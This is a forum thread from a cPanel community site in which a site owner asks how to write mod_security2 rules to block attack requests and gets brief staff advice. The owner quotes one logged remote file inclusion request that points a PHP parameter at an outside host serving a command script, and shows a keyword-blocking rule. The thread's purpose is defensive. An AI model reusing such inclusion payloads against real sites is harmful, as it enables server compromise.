The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    333
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
    #1 SuperBaby, Jan 20, 2008
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    713
    Likes Received:
    4
    Trophy Points:
    243
    #2 cPDan, Jan 21, 2008
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    333
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
    #3 SuperBaby, Jan 21, 2008
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    713
    Likes Received:
    4
    Trophy Points:
    243
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
    #4 cPDan, Jan 21, 2008
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    333
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    #5 SuperBaby, Jan 21, 2008
(You must log in or sign up to post here.)
Loading...
Similar Threads - Create mod_security2 rules
  1. keat63

    Create a SpamAssassin Score?

    keat63, Jun 22, 2017 at 8:28 AM, in forum: E-mail Discussions
    Replies:
    2
    Views:
    40
    keat63
    Jun 22, 2017 at 10:01 AM
  2. nslave

    Cannot create account Inappropriate ioctl for device error

    nslave, Jun 7, 2017, in forum: General Discussion
    Replies:
    3
    Views:
    67
    cPanelMichael
    Jun 7, 2017
  3. basheer ahmed

    SOLVED cPanel create email account api access issue

    basheer ahmed, Jun 7, 2017, in forum: cPanel Developers
    Replies:
    1
    Views:
    75
    basheer ahmed
    Jun 7, 2017
  4. ignaciotec

    Not allowed to create cron jobs (pam config)

    ignaciotec, Jun 6, 2017, in forum: General Discussion
    Replies:
    1
    Views:
    50
    cPanelMichael
    Jun 6, 2017
  5. eugeny-sp

    Create cPAddon Documentation Link

    eugeny-sp, May 26, 2017, in forum: cPanel Developers
    Replies:
    1
    Views:
    71
    cPanelMichael
    May 26, 2017

Share This Page